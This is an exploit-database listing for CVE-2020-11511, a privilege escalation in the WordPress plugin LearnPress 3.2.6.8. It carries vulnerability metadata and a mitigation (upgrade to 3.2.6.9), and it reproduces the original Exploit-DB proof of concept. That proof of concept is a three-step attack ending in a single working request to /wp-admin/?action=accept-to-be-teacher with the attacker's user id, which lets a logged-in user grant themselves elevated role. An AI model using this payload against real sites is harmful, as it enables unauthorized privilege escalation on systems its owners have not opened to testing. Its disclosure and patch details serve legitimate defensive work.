header-logo
Suggest Exploit
vendor:
LearnPress
by:
nhattruong or nhattruong.blog
8,1
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: LearnPress
Affected Version From: 3.2.6.8
Affected Version To: 3.2.6.8
Patch Exists: YES
Related CWE: CVE-2020-11511
CPE: a:thimpress:learnpress
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=136191
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2021

WordPress Plugin LearnPress 3.2.6.8 – Privilege Escalation

WordPress Plugin LearnPress version 3.2.6.8 is vulnerable to privilege escalation. An attacker can exploit this vulnerability by finding out their user id and executing the payload http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

Mitigation:

Upgrade to version 3.2.6.9 or later
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!

Navigation

Suggest Exploit

Services By CQR